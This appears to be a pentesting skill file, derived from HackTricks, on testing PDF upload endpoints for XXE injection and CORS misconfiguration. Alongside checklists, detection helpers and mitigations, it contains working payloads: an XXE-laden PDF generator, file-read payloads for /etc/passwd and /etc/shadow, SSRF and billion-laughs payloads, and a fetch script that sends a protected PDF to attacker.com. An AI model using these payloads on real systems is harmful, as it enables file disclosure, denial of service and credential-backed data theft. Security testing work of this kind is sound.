Hacktricks-skills pdf-upload-xxe-cors-bypass

How to test PDF upload endpoints for XXE (XML External Entity) injection and CORS bypass vulnerabilities. Use this skill whenever you're pentesting file upload functionality, especially PDF uploads, or when investigating XXE injection vectors through file parsing. Make sure to use this skill when the user mentions PDF uploads, file upload vulnerabilities, XXE injection, CORS misconfigurations, or any file parsing security testing.

Install (clone the upstream repo):
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass/SKILL.MD

PDF Upload - XXE and CORS Bypass Testing

This skill helps you identify and exploit XXE (XML External Entity) injection vulnerabilities and CORS bypass issues in PDF upload endpoints.

Understanding the Vulnerabilities

XXE in PDF Uploads

PDF files can embed XML, for example XMP metadata streams and XFA forms. When a server-side PDF library parses that XML with DTDs and external entities enabled, an uploaded PDF may lead to:

  • Local file disclosure - Reading files from the server filesystem
  • SSRF - Making requests to internal services
  • RCE - Rarely, remote code execution, when the parser stack exposes a command-executing URI handler (for example PHP's expect:// wrapper)
  • DoS - Billion laughs attack via entity expansion

CORS Bypass in PDF Uploads

CORS (Cross-Origin Resource Sharing) misconfigurations can allow:

  • Cross-origin PDF access - Reading PDFs from other domains
  • Credential theft - Accessing authenticated PDF content
  • Data exfiltration - Extracting sensitive information from PDFs

Testing Methodology

Step 1: Identify PDF Upload Endpoints

Look for endpoints that accept PDF files:

# Find upload handlers (requires access to the application source)
grep -rn "upload" /path/to/app/
grep -rn "\.pdf" /path/to/app/

# Check a page for file upload forms
curl -s https://target.com/upload | grep -iE 'type="file"|multipart/form-data'
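
When a page contains several forms, grepping gets noisy. The following is a minimal sketch, using only the Python standard library, that lists the forms containing a file input. The class and function names are illustrative, not part of any existing tool.

```python
from html.parser import HTMLParser


class UploadFormFinder(HTMLParser):
    """Collect forms that contain at least one <input type="file">."""

    def __init__(self):
        super().__init__()
        self._current = None      # form currently being parsed, if any
        self.upload_forms = []    # forms that accept file uploads

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                "enctype": attrs.get("enctype") or "",
                "accept": [],
                "has_file_input": False,
            }
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "file":
                self._current["has_file_input"] = True
                self._current["accept"].append(attrs.get("accept") or "")

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["has_file_input"]:
                self.upload_forms.append(self._current)
            self._current = None


def find_upload_forms(html):
    """Return a list of dicts describing each upload form in the HTML."""
    finder = UploadFormFinder()
    finder.feed(html)
    finder.close()
    return finder.upload_forms
```

Feed it the body returned by curl. A form whose accept list contains ".pdf" or "application/pdf" is a likely PDF upload endpoint, though the server-side check is what actually matters.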

Step 2: Test for XXE Injection

Create a Malicious PDF with XXE Payload

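PDF files can embed XML content. Create a test PDF that carries the XXE payload in its XMP metadata stream:

# scripts/create-xxe-pdf.py
import fitz  # PyMuPDF

# XMP-style metadata packet carrying the XXE payload (test target: /etc/passwd)
XXE_XMP = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xmpmeta [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/">
  <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/">
      <dc:description>&xxe;</dc:description>
    </rdf:Description>
  </rdf:RDF>
</x:xmpmeta>"""

def create_xxe_pdf(output_path):
    doc = fitz.open()
    page = doc.new_page()

    # Visible marker text so the file is easy to recognize
    page.insert_text((72, 72), "Test PDF for XXE")

    # Store the payload as the document's XML metadata; PyMuPDF does not validate it
    doc.set_xml_metadata(XXE_XMP)

    # Save the PDF
    doc.save(output_path)
    doc.close()

    print(f"Created: {output_path}")

if __name__ == "__main__":
    create_xxe_pdf("xxe_test.pdf")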

XXE Payloads to Test

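Basic XXE Payload:

<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>

File Read Payload:

<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<data>&xxe;</data>

SSRF Payload:

<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://internal-service:8080/admin"> ]>
<data>&xxe;</data>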
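
The file-read and SSRF payloads differ only in the SYSTEM URI, so they can be generated from one template. This is a small sketch; the function name and the root element name `data` are assumptions chosen for illustration. Note that a general entity is declared inside a DOCTYPE and referenced as `&xxe;` in the document body.

```python
def build_xxe_document(system_uri, root="data", entity="xxe"):
    """Return a complete XML document that references an external entity.

    The entity is declared in the internal DTD subset and then used in
    the body, which is what makes a vulnerable parser fetch system_uri.
    """
    if '"' in system_uri:
        raise ValueError("system_uri must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY {entity} SYSTEM "{system_uri}">\n'
        "]>\n"
        f"<{root}>&{entity};</{root}>\n"
    )


# Targets taken from the payloads listed above
PAYLOADS = {
    "file-read": build_xxe_document("file:///etc/passwd"),
    "ssrf": build_xxe_document("http://internal-service:8080/admin"),
}
```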

Billion Laughs (DoS):

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
]>
<data>&a;</data>
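
To see why nested entities are dangerous, it helps to work out the expansion size. In the payload above, four entities each repeat the next one ten times, so the seed string is multiplied by 10^4. The sketch below computes that figure and confirms it on a deliberately tiny document with Python's standard ElementTree parser. The function names are illustrative, and the measurement should only be run with small parameters.

```python
import xml.etree.ElementTree as ET


def build_nested_entities(levels, fanout, seed):
    """Build a document where e0 is the seed and each e(k) repeats e(k-1)."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for k in range(1, levels + 1):
        refs = f"&e{k - 1};" * fanout
        decls.append(f'<!ENTITY e{k} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE r [\n  {body}\n]>\n<r>&e{levels};</r>"


def expanded_length(levels, fanout, seed_len):
    """Predicted size of the fully expanded text, in characters."""
    return seed_len * fanout ** levels


def measured_length(document):
    """Parse the document and measure the expanded text (small inputs only)."""
    return len(ET.fromstring(document).text)
```

For example, `expanded_length(4, 10, 1)` gives the 10,000x multiplier of the payload above. Each extra level multiplies the result by the fan-out again, which is how a payload of a few hundred bytes grows to gigabytes.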

Step 3: Test CORS Configuration

Check CORS Headers

# Test CORS headers on the PDF endpoint with an untrusted origin
curl -s -I -H "Origin: https://evil.com" https://target.com/api/pdf/upload

# Check whether the "null" origin is trusted ("*" is not a valid Origin value)
curl -s -I -H "Origin: null" https://target.com/api/pdf/upload

# Test a look-alike origin to catch weak prefix matching
curl -s -I -H "Origin: https://target.com.attacker.com" https://target.com/api/pdf/upload
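
Origin validation often fails on edge cases rather than on an obviously foreign origin. The sketch below generates a set of test origins for a target URL; the labels and the `attacker.example` domain are hypothetical placeholders.

```python
from urllib.parse import urlsplit


def candidate_origins(target_url, attacker_domain="attacker.example"):
    """Return labelled Origin header values worth testing against a target."""
    parts = urlsplit(target_url)
    scheme, host = parts.scheme, parts.hostname
    return {
        # Completely unrelated origin
        "unrelated": f"https://{attacker_domain}",
        # Sent by sandboxed iframes and some local contexts
        "null": "null",
        # Passes checks that only test whether the origin starts with the target
        "target-as-prefix": f"{scheme}://{host}.{attacker_domain}",
        # Passes checks that only test whether the origin ends with the target
        "target-as-suffix": f"{scheme}://evil{host}",
        # Relevant when every subdomain is trusted
        "subdomain": f"{scheme}://evil.{host}",
        # Relevant when the scheme is not compared
        "scheme-downgrade": f"http://{host}",
    }
```

Each value can be passed to curl with `-H "Origin: <value>"`. Any value that comes back in Access-Control-Allow-Origin deserves a closer look.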

Common CORS Misconfigurations

| Header | Vulnerable Value | Risk |
|---|---|---|
| Access-Control-Allow-Origin | * | High - allows any origin (browsers send no credentials) |
| Access-Control-Allow-Origin | Reflected origin | Medium - reflects attacker's origin |
| Access-Control-Allow-Credentials | true with a reflected origin (browsers reject true with *) | Critical - allows credentialed requests from any origin |
| Access-Control-Allow-Methods | * | Medium - allows all HTTP methods |
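
The misconfigurations listed above can be checked mechanically once the response headers are captured. This is a rough sketch, not a complete scanner; the finding labels are made up for illustration, and `sent_origin` is assumed to be an origin the server should not trust.

```python
def classify_cors(sent_origin, response_headers):
    """Map CORS response headers to a list of finding labels.

    sent_origin: the untrusted Origin value sent with the request.
    response_headers: dict of header name to value from the response.
    """
    headers = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = headers.get("access-control-allow-origin")
    creds = headers.get("access-control-allow-credentials", "").lower() == "true"

    findings = []
    if acao == "*":
        # Browsers refuse to expose credentialed responses under a wildcard
        findings.append("wildcard-origin")
    elif acao == "null":
        findings.append("null-origin-with-credentials" if creds else "null-origin")
    elif acao is not None and acao == sent_origin:
        findings.append(
            "reflected-origin-with-credentials" if creds else "reflected-origin"
        )
    if headers.get("access-control-allow-methods") == "*":
        findings.append("wildcard-methods")
    return findings
```

An empty list means none of these patterns matched, not that the configuration is safe.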

Step 4: Exploitation Techniques

XXE Exploitation

  1. File Disclosure:

    # Upload malicious PDF and check response
    curl -s -X POST https://target.com/upload \
      -F "file=@malicious.pdf" \
      | grep -i "root:"  # Check for /etc/passwd content
    
  2. SSRF:

    # Monitor for internal requests
    # Check if internal services are accessible
    curl -X POST https://target.com/upload \
      -F "file=@ssrf-pdf.pdf"
    
  3. Out-of-Band Data Exfiltration:

    # Set up listener
    nc -lvnp 4444
    
    # Upload PDF with XXE pointing to your server
    curl -X POST https://target.com/upload \
      -F "file=@oob-pdf.pdf"
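
As an alternative to a raw netcat listener, an HTTP listener records the exact path the parser requested, which makes callbacks easier to attribute. Below is a minimal standard-library sketch; the class and function names are illustrative. It binds to 127.0.0.1 by default, so for a real test it would need to bind to an address the target can reach.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class CallbackRecorder(BaseHTTPRequestHandler):
    """Record every GET request as (client_ip, path)."""

    hits = []  # shared across requests

    def do_GET(self):
        self.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the console quiet; hits holds the evidence


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackRecorder)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_callback(server, path="/xxe-probe"):
    """Send one request to the listener to confirm it records hits."""
    host, port = server.server_address[:2]
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        return conn.getresponse().status
    finally:
        conn.close()
```

Putting a unique path per upload in the SYSTEM URI ties each recorded hit back to the PDF that caused it.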
    

CORS Bypass Exploitation

  1. Cross-Origin PDF Access:

    <!-- scripts/cors-test.html -->
    <script>
    fetch('https://target.com/api/pdf/protected.pdf', {
      method: 'GET',
      mode: 'cors',
      credentials: 'include'
    })
    .then(response => response.blob())  // PDFs are binary; text() would corrupt them
    .then(data => {
      // Send to attacker server
      fetch('https://attacker.com/collect', {
        method: 'POST',
        body: data
      });
    });
    </script>
    
  2. Credential Theft:

    // If CORS allows credentials, authenticated requests work
    fetch('https://target.com/api/pdf/user-data.pdf', {
      credentials: 'include'  // Sends cookies
    });
    

Step 5: Verification and Reporting

XXE Verification Checklist

  • Server processes XML entities in PDF content
  • File read payloads return expected content
  • SSRF payloads reach internal services
  • DoS payloads cause resource exhaustion
  • Error messages reveal parsing details
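
Several of the checks above come down to spotting known strings in the upload response. The sketch below scans a response body for a few indicators. The patterns are illustrative examples of /etc/passwd content and common XML parser error text, not an exhaustive list.

```python
import re

# Illustrative indicators only; extend for the target's technology stack
INDICATORS = {
    "passwd-content": re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE),
    "parser-error": re.compile(
        r"DOCTYPE is disallowed|SAXParseException|XMLSyntaxError"
        r"|undefined entity|xmlParseEntityRef",
        re.IGNORECASE,
    ),
}


def scan_response(body):
    """Return the names of all indicators found in the response body."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(body)]
```

A "parser-error" hit does not prove exploitability, but it confirms that the embedded XML reached a parser, which is worth recording as evidence.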

CORS Verification Checklist

  • Access-Control-Allow-Origin is not *
  • Origin is not reflected in response
  • Credentials are not allowed with wildcard origin
  • Sensitive PDFs are not accessible cross-origin
  • CORS preflight requests are properly validated

Common Tools

PDF Manipulation

# Install PyMuPDF
pip install pymupdf

# Create test PDFs
python scripts/create-xxe-pdf.py

# Inspect PDF structure and dump the XML metadata stream
pdfinfo target.pdf
pdfinfo -meta target.pdf

CORS Testing

# Use curl for manual testing
curl -I -H "Origin: https://evil.com" https://target.com/api/pdf

# Use browser DevTools
# Check Network tab for CORS headers

Automated Scanning

# Check for XXE in file upload (xxe.yaml is a placeholder for your own template path)
nuclei -u https://target.com/upload -t xxe.yaml

# Check CORS configuration (cors.yaml is likewise a placeholder)
nuclei -u https://target.com/api/pdf -t cors.yaml

Mitigation Recommendations

For XXE

  1. Disable DTD and external entity processing in the XML parser used by the PDF library
  2. Validate file content - ensure uploaded files are actually PDFs
  3. Use allowlists for permitted file types
  4. Sanitize input before processing
  5. Run parsers in sandboxed environments
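
One way to apply the first recommendation is to refuse any XML that declares a DOCTYPE, since entities cannot be defined without one. The following is a minimal sketch using Python's standard expat binding. The function and exception names are illustrative, and a real PDF pipeline would apply the equivalent setting in whatever XML parser its PDF library uses.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def parse_without_dtd(xml_data):
    """Parse XML and return its text content, rejecting any DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Abort before any entity declaration is processed
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    chunks = []
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_data, True)
    return "".join(chunks)
```

Rejecting the DOCTYPE outright blocks external entities and entity expansion together, at the cost of refusing the rare legitimate document that carries a DTD.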

For CORS

  1. Set specific origins instead of *
  2. Don't reflect the request's Origin header without checking it against an allowlist
  3. Disable credentials when using wildcard origin
  4. Validate preflight requests
  5. Use SameSite cookies for additional protection
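
The first three recommendations can be combined into a single exact-match allowlist check on the server. This is a framework-agnostic sketch; the function name and the `https://app.example.com` origin are hypothetical.

```python
# Hypothetical allowlist; replace with the application's real front-end origins
ALLOWED_ORIGINS = frozenset({"https://app.example.com"})


def cors_headers(request_origin, allowed=ALLOWED_ORIGINS, allow_credentials=False):
    """Return the CORS response headers for a request's Origin value.

    Only exact matches are accepted: no wildcard, no prefix or suffix
    matching, and no trust in the "null" origin.
    """
    headers = {"Vary": "Origin"}  # responses differ per origin, so caches must know
    if request_origin in allowed:
        headers["Access-Control-Allow-Origin"] = request_origin
        if allow_credentials:
            headers["Access-Control-Allow-Credentials"] = "true"
    return headers
```

Comparing whole origin strings avoids the prefix and suffix matching mistakes that look-alike domains exploit.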

Example Workflow

# 1. Create test PDF with XXE payload
python scripts/create-xxe-pdf.py

# 2. Upload and test for XXE
curl -X POST https://target.com/upload \
  -F "file=@xxe_test.pdf" \
  -v

# 3. Check CORS headers
curl -I -H "Origin: https://evil.com" \
  https://target.com/api/pdf/upload

# 4. Analyze response for vulnerabilities
# 5. Document findings and recommend fixes

Important Notes

  • Always get authorization before testing file upload vulnerabilities
  • Test in isolated environments to avoid impacting production
  • Document all findings with evidence and reproduction steps
  • Follow responsible disclosure when reporting vulnerabilities
  • Consider business impact when prioritizing remediation